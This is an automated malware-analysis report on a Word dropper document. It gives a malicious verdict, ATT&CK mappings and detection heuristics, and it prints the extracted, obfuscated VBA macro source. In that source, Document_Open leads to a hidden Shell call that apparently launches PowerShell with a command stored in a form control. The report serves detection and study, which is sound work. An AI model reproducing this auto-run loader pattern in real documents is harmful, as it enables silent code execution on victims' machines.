Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic; T1203 Exploitation for Client Execution
The sample contains VBA macros, including a Document_Open macro that triggers the execution of the Shell() function. This indicates an attempt to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6834984-0' further supports its malicious nature as a dropper. The embedded URL is benign and likely a false positive.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-6834984-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6834984-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1969 bytes |

SHA-256 (macros.bas): a546531e92e69d339e0009a0f4e2b575b8f6e600b5a0cb402c0aa956428bcb26
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim Au9kFm
Au9kFm = Ya1U6
Dim lDKiqQtw() As Byte
x
End Sub
Public Sub sh(tNIzs0K As String, IRTE5rz As Integer)
Dim wlg1b6ck As String
wlg1b6ck = H5PFvk
Dim qfVwed(13 To 175) As Long
qfVwed(13) = 106 + 13
Dim rnwmJTD(12 To 240) As Long
rnwmJTD(12) = 19200 / 96
Dim jaeYEb() As Byte
Dim N38BwD(5 To 136) As Long
N38BwD(5) = 57 + 87
Dim ll0L2q(9 To 222) As String
ll0L2q(9) = "lPegNUT5"
Dim w7yTB(9 To 222) As Long
w7yTB(9) = -607 + 639
End Sub
Attribute VB_Name = "kSfl0eQcY"
Sub x()
Dim Z80jrG
Z80jrG = lrIj8
Dim QOnoh(5 To 43) As Long
QOnoh(5) = -70 + 207
Dim rtsrG As String
rtsrG = bsmpcEKqX
Dim YQ1X48(15 To 143) As Long
YQ1X48(15) = 247 - 25
Call VBA.Shell("po" & _
YlGyHP, 0)
Dim apROA6xIW() As Byte
Dim ZhcKueFHj As Long
ZhcKueFHj = (-768 + 778) * (10)
End Sub
Attribute VB_Name = "AoMcI0"
Public Function HndPxI(fON7dqlgw As Integer)
Dim J2CvWpJ(46) As Byte
Dim MvTUY6e(1 To 52) As Long
MvTUY6e(1) = 84 + 103
Dim QoWKi(3 To 97) As Long
QoWKi(3) = 1505 - 1485
Dim tav0iU As Long
tav0iU = (17513 - 17512) * (42)
End Function
Attribute VB_Name = "CkA3x"
Public Function YlGyHP()
Dim VuTGsh As Object
Set VuTGsh = New f
Dim jhCYncK8(9 To 36) As String
jhCYncK8(9) = "Okj0aZ"
Dim yp3CIdx1f As String
yp3CIdx1f = VuTGsh.de.Text
YlGyHP = yp3CIdx1f
End Function
Attribute VB_Name = "f"
Attribute VB_Base = "0{727E47F7-24C9-4B4B-A99D-E1647AF4D90B}{7144EE7B-0C8B-472F-A5C2-C0E07CE59BEE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```